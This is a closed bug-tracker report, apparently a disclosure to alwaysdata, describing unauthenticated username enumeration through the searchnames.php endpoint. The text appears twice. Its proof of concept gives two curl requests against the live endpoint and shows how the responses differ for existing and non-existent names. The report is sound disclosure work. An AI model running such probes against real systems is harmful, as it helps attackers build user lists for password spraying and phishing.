alwaysdata All Projects: Tasklist

	ID	Status	Summary	Opened by
	~~329~~	Closed	~~Unauthenticated Username Enumeration~~	hellofresh01	Task Description 1. Executive Summary During a security assessment of the security.alwaysdata.com infrastructure, a medium-severity vulnerability was identified in the user registration/validation logic. An unauthenticated endpoint allows for the systematic enumeration of valid usernames. This information disclosure can be leveraged by malicious actors to conduct targeted brute-force attacks, credential stuffing, or sophisticated social engineering campaigns. 2. Vulnerability Information Field Details Vulnerability Type Information Exposure (Username Enumeration) Severity Medium Status Open Affected Component searchnames.php Vector Network / Web API 3. Technical Analysis Root Cause The endpoint searchnames.php is designed to provide real-time feedback during the account creation process. However, the root cause of the issue is twofold: Lack of Authentication: The endpoint is accessible to any unauthenticated user or automated script. Differential Responses: The server returns distinct boolean strings (true vs false\|message) based on whether a username exists in the database. Vulnerability Details File Source: [https://security.alwaysdata.com/js/functions.js](https://security.alwaysdata.com/js/functions.js) Endpoint: [https://security.alwaysdata.com/js/callbacks/searchnames.php](https://security.alwaysdata.com/js/callbacks/searchnames.php) Parameter: name 4. Proof of Concept (PoC) The following curl commands demonstrate how an attacker can distinguish between an existing and a non-existing account. Test 1: Existing Username (Admin) Bash curl -s -X GET "https://security.alwaysdata.com/js/callbacks/searchnames.php?name=admin" \ -H "Content-Type: application/json" Response: false\|That username is already taken. You will need to choose another one. Test 2: Non-Existent Username Bash curl -s -X GET "https://security.alwaysdata.com/js/callbacks/searchnames.php?name=admin123456789" \ -H "Content-Type: application/json" Response: true 5. Impact Targeted Attacks: Attackers can build a list of valid users to perform password spraying or brute-force attacks. Social Engineering: Knowledge of valid usernames facilitates more convincing phishing attempts against specific employees or users.

~~329~~

Closed

~~Unauthenticated Username Enumeration~~

Task Description

1. Executive Summary
During a security assessment of the security.alwaysdata.com infrastructure, a medium-severity vulnerability was identified in the user registration/validation logic. An unauthenticated endpoint allows for the systematic enumeration of valid usernames. This information disclosure can be leveraged by malicious actors to conduct targeted brute-force attacks, credential stuffing, or sophisticated social engineering campaigns.

2. Vulnerability Information
Field Details
Vulnerability Type Information Exposure (Username Enumeration)
Severity Medium
Status Open
Affected Component searchnames.php
Vector Network / Web API 3. Technical Analysis
Root Cause
The endpoint searchnames.php is designed to provide real-time feedback during the account creation process. However, the root cause of the issue is twofold:

Lack of Authentication: The endpoint is accessible to any unauthenticated user or automated script.

Differential Responses: The server returns distinct boolean strings (true vs false|message) based on whether a username exists in the database.

Vulnerability Details
File Source: [https://security.alwaysdata.com/js/functions.js](https://security.alwaysdata.com/js/functions.js)

Endpoint: [https://security.alwaysdata.com/js/callbacks/searchnames.php](https://security.alwaysdata.com/js/callbacks/searchnames.php)

Parameter: name

4. Proof of Concept (PoC)
The following curl commands demonstrate how an attacker can distinguish between an existing and a non-existing account.

Test 1: Existing Username (Admin)
Bash

curl -s -X GET "https://security.alwaysdata.com/js/callbacks/searchnames.php?name=admin" \
-H "Content-Type: application/json"
Response:

false|That username is already taken. You will need to choose another one.

Test 2: Non-Existent Username
Bash

curl -s -X GET "https://security.alwaysdata.com/js/callbacks/searchnames.php?name=admin123456789" \
-H "Content-Type: application/json"
Response:

true

5. Impact
Targeted Attacks: Attackers can build a list of valid users to perform password spraying or brute-force attacks.

Social Engineering: Knowledge of valid usernames facilitates more convincing phishing attempts against specific employees or users.

Showing tasks 1 - 1 of 1 Page 1 of 1

All Projects

Available keyboard shortcuts

Tasklist

Task Details

Task Editing